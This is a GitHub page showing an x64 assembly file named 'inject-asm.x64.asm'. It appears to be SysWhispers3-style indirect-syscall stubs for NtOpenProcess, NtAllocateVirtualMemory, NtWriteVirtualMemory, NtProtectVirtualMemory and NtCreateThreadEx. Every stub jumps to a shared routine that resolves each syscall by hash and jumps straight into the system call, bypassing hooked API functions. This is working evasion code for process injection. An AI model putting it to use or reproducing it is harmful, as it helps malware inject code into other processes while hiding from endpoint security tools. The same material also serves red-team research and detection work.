-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathinject-asm.x64.asm
More file actions
61 lines (47 loc) · 1.26 KB
/
inject-asm.x64.asm
File metadata and controls
61 lines (47 loc) · 1.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
.code
EXTERN getGlobalHash: PROC
EXTERN SW3_GetSyscallNumber: PROC
EXTERN SW3_GetSyscallAddress: PROC
Sw3NtAllocateVirtualMemory PROC
jmp pipo
Sw3NtAllocateVirtualMemory ENDP
Sw3NtWaitForSingleObject PROC
jmp pipo
Sw3NtWaitForSingleObject ENDP
Sw3NtCreateThreadEx PROC
jmp pipo
Sw3NtCreateThreadEx ENDP
Sw3NtClose PROC
jmp pipo
Sw3NtClose ENDP
Sw3NtWriteVirtualMemory PROC
jmp pipo
Sw3NtWriteVirtualMemory ENDP
Sw3NtProtectVirtualMemory PROC
jmp pipo
Sw3NtProtectVirtualMemory ENDP
Sw3NtOpenProcess PROC
jmp pipo
Sw3NtOpenProcess ENDP
pipo PROC
mov [rsp +8], rcx
mov [rsp+16], rdx
mov [rsp+24], r8
mov [rsp+32], r9
sub rsp, 28h
call getGlobalHash ; remove hash
mov rcx, rax
call SW3_GetSyscallAddress
mov r11, rax
call getGlobalHash ; remove hash
mov rcx, rax
call SW3_GetSyscallNumber
add rsp, 28h
mov rcx, [rsp+8]
mov rdx, [rsp+16]
mov r8, [rsp+24]
mov r9, [rsp+32]
mov r10, rcx
jmp r11
pipo ENDP
end